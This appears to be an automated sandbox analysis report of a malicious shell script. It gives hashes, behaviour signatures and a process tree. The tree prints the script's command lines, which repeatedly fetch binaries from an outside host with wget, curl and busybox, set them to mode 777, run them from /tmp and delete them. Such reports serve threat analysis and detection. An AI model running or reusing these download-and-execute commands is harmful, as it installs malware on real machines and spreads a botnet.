Analysis
-
max time kernel
79s -
max time network
107s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipsel image:debian9-mipsel-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
01-11-2024 04:04
Static task
static1
Behavioral task
behavioral1
Sample
702381acc309aa91d73d0237d2690231cf4fca9bc9c19bbe322c0f2ddf89575b.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
702381acc309aa91d73d0237d2690231cf4fca9bc9c19bbe322c0f2ddf89575b.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
702381acc309aa91d73d0237d2690231cf4fca9bc9c19bbe322c0f2ddf89575b.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
702381acc309aa91d73d0237d2690231cf4fca9bc9c19bbe322c0f2ddf89575b.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
702381acc309aa91d73d0237d2690231cf4fca9bc9c19bbe322c0f2ddf89575b.sh
-
Size
10KB
-
MD5
b5f00b34167fe96b81dc9665e6270fa1
-
SHA1
85c7e0bcb2347c19116b2c25edec820fb146b6d0
-
SHA256
702381acc309aa91d73d0237d2690231cf4fca9bc9c19bbe322c0f2ddf89575b
-
SHA512
7b946d54011a2a0dab5d02d954062d55468a624a8efa18baba4d31e0c99bfba3592a845cf51555e4ffa0078bcb1aa5f3aa7bacd25f492cfdc17793d6c6c0bdbf
-
SSDEEP
192:SBfFdewQdKWQGeqVwYjPmOhkwkpzmOhkwEfAwQdKW6aeqVwYU:SBfFdewQdKWzPmOhkwkpzmOhkwEfAwQO
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/702381acc309aa91d73d0237d2690231cf4fca9bc9c19bbe322c0f2ddf89575b.sh/tmp/702381acc309aa91d73d0237d2690231cf4fca9bc9c19bbe322c0f2ddf89575b.sh1⤵PID:713
-
/bin/rm/bin/rm bins.sh2⤵PID:717
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc2⤵
- System Network Configuration Discovery
PID:723
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:734
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc2⤵
- System Network Configuration Discovery
PID:742
-
-
/bin/chmodchmod 777 xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc2⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc./xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc2⤵
- Executes dropped EXE
PID:746
-
-
/bin/rmrm xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc2⤵PID:748
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i2⤵
- System Network Configuration Discovery
PID:749
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i2⤵
- System Network Configuration Discovery
PID:753
-
-
/bin/chmodchmod 777 ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i2⤵
- File and Directory Permissions Modification
PID:754
-
-
/tmp/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i./ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i2⤵
- Executes dropped EXE
PID:755
-
-
/bin/rmrm ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i2⤵PID:756
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X2⤵
- System Network Configuration Discovery
PID:757
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:758
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X2⤵
- System Network Configuration Discovery
PID:763
-
-
/bin/chmodchmod 777 YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X2⤵
- File and Directory Permissions Modification
PID:767
-
-
/tmp/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X./YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X2⤵
- Executes dropped EXE
PID:768
-
-
/bin/rmrm YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X2⤵PID:771
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK2⤵
- System Network Configuration Discovery
PID:773
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:779
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK2⤵
- System Network Configuration Discovery
PID:788
-
-
/bin/chmodchmod 777 x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK2⤵
- File and Directory Permissions Modification
PID:792
-
-
/tmp/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK./x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK2⤵
- Executes dropped EXE
PID:793
-
-
/bin/rmrm x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK2⤵PID:796
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m2⤵
- System Network Configuration Discovery
PID:797
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:804
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m2⤵
- System Network Configuration Discovery
PID:815
-
-
/bin/chmodchmod 777 qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m2⤵
- File and Directory Permissions Modification
PID:821
-
-
/tmp/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m./qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m2⤵
- Executes dropped EXE
PID:822
-
-
/bin/rmrm qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m2⤵PID:824
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/200cUyejdGjWDM9heC9D1Qq26iolWznBRb2⤵
- System Network Configuration Discovery
PID:825
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/200cUyejdGjWDM9heC9D1Qq26iolWznBRb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:826
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/200cUyejdGjWDM9heC9D1Qq26iolWznBRb2⤵
- System Network Configuration Discovery
PID:828
-
-
/bin/chmodchmod 777 200cUyejdGjWDM9heC9D1Qq26iolWznBRb2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/200cUyejdGjWDM9heC9D1Qq26iolWznBRb./200cUyejdGjWDM9heC9D1Qq26iolWznBRb2⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm 200cUyejdGjWDM9heC9D1Qq26iolWznBRb2⤵PID:831
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ22⤵
- System Network Configuration Discovery
PID:832
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ22⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:833
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ22⤵
- System Network Configuration Discovery
PID:838
-
-
/bin/chmodchmod 777 Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ22⤵
- File and Directory Permissions Modification
PID:839
-
-
/tmp/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2./Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ22⤵
- Executes dropped EXE
PID:840
-
-
/bin/rmrm Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ22⤵PID:842
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX2⤵
- System Network Configuration Discovery
PID:843
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:844
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX2⤵
- System Network Configuration Discovery
PID:852
-
-
/bin/chmodchmod 777 8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX2⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX./8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX2⤵
- Executes dropped EXE
PID:859
-
-
/bin/rmrm 8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX2⤵PID:862
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA2⤵
- System Network Configuration Discovery
PID:863
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:866
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA2⤵
- System Network Configuration Discovery
PID:875
-
-
/bin/chmodchmod 777 alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA./alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA2⤵PID:883
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz2⤵
- System Network Configuration Discovery
PID:885
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz2⤵PID:891
-
-
/bin/chmodchmod 777 iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz./iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz2⤵PID:895
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp2⤵
- System Network Configuration Discovery
PID:896
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp2⤵
- System Network Configuration Discovery
PID:899
-
-
/bin/chmodchmod 777 O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp2⤵
- File and Directory Permissions Modification
PID:900
-
-
/tmp/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp./O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp2⤵
- Executes dropped EXE
PID:901
-
-
/bin/rmrm O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp2⤵PID:902
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz2⤵
- System Network Configuration Discovery
PID:903
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:904
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz2⤵
- System Network Configuration Discovery
PID:906
-
-
/bin/chmodchmod 777 Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz./Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz2⤵PID:910
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G12⤵
- System Network Configuration Discovery
PID:911
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G12⤵PID:914
-
-
/bin/chmodchmod 777 hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G12⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1./hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G12⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G12⤵PID:917
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd2⤵
- System Network Configuration Discovery
PID:918
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd2⤵
- System Network Configuration Discovery
PID:921
-
-
/bin/chmodchmod 777 3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd./3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm 3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd2⤵PID:925
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp2⤵
- System Network Configuration Discovery
PID:926
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp2⤵PID:929
-
-
/bin/chmodchmod 777 O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp2⤵
- File and Directory Permissions Modification
PID:930
-
-
/tmp/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp./O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp2⤵
- Executes dropped EXE
PID:931
-
-
/bin/rmrm O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp2⤵PID:932
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz2⤵
- System Network Configuration Discovery
PID:933
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:934
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz2⤵PID:936
-
-
/bin/chmodchmod 777 Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz./Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz2⤵PID:940
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G12⤵PID:941
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G12⤵
- System Network Configuration Discovery
PID:944
-
-
/bin/chmodchmod 777 hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G12⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1./hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G12⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G12⤵PID:947
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd2⤵
- System Network Configuration Discovery
PID:948
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd2⤵
- System Network Configuration Discovery
PID:951
-
-
/bin/chmodchmod 777 3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd2⤵
- File and Directory Permissions Modification
PID:952
-
-
/tmp/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd./3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd2⤵
- Executes dropped EXE
PID:953
-
-
/bin/rmrm 3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd2⤵PID:954
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc2⤵
- System Network Configuration Discovery
PID:955
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:956
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc2⤵PID:958
-
-
/bin/chmodchmod 777 xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc./xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc2⤵PID:962
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i2⤵
- System Network Configuration Discovery
PID:963
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:964
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i2⤵
- System Network Configuration Discovery
PID:966
-
-
/bin/chmodchmod 777 ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i./ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i2⤵PID:970
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X2⤵
- System Network Configuration Discovery
PID:971
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X2⤵
- System Network Configuration Discovery
PID:974
-
-
/bin/chmodchmod 777 YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X2⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X./YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X2⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X2⤵PID:977
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK2⤵
- System Network Configuration Discovery
PID:978
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:979
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK2⤵PID:981
-
-
/bin/chmodchmod 777 x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK2⤵
- File and Directory Permissions Modification
PID:982
-
-
/tmp/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK./x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK2⤵
- Executes dropped EXE
PID:983
-
-
/bin/rmrm x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK2⤵PID:985
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m2⤵
- System Network Configuration Discovery
PID:986
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:987
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m2⤵PID:989
-
-
/bin/chmodchmod 777 qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m2⤵
- File and Directory Permissions Modification
PID:990
-
-
/tmp/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m./qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m2⤵
- Executes dropped EXE
PID:991
-
-
/bin/rmrm qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m2⤵PID:992
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/200cUyejdGjWDM9heC9D1Qq26iolWznBRb2⤵
- System Network Configuration Discovery
PID:993
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/200cUyejdGjWDM9heC9D1Qq26iolWznBRb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:994
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/200cUyejdGjWDM9heC9D1Qq26iolWznBRb2⤵
- System Network Configuration Discovery
PID:996
-
-
/bin/chmodchmod 777 200cUyejdGjWDM9heC9D1Qq26iolWznBRb2⤵
- File and Directory Permissions Modification
PID:997
-
-
/tmp/200cUyejdGjWDM9heC9D1Qq26iolWznBRb./200cUyejdGjWDM9heC9D1Qq26iolWznBRb2⤵
- Executes dropped EXE
PID:998
-
-
/bin/rmrm 200cUyejdGjWDM9heC9D1Qq26iolWznBRb2⤵PID:999
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ22⤵
- System Network Configuration Discovery
PID:1000
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1001
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ22⤵
- System Network Configuration Discovery
PID:1003
-
-
/bin/chmodchmod 777 Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ22⤵
- File and Directory Permissions Modification
PID:1004
-
-
/tmp/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2./Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ22⤵
- Executes dropped EXE
PID:1005
-
-
/bin/rmrm Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ22⤵PID:1006
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX2⤵
- System Network Configuration Discovery
PID:1007
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1008
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX2⤵
- System Network Configuration Discovery
PID:1010
-
-
/bin/chmodchmod 777 8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX2⤵
- File and Directory Permissions Modification
PID:1011
-
-
/tmp/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX./8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX2⤵
- Executes dropped EXE
PID:1012
-
-
/bin/rmrm 8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX2⤵PID:1013
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA2⤵
- System Network Configuration Discovery
PID:1014
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1015
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA2⤵
- System Network Configuration Discovery
PID:1017
-
-
/bin/chmodchmod 777 alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA2⤵
- File and Directory Permissions Modification
PID:1018
-
-
/tmp/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA./alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA2⤵
- Executes dropped EXE
PID:1019
-
-
/bin/rmrm alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA2⤵PID:1021
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz2⤵PID:1022
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1023
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz2⤵
- System Network Configuration Discovery
PID:1025
-
-
/bin/chmodchmod 777 iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz2⤵
- File and Directory Permissions Modification
PID:1026
-
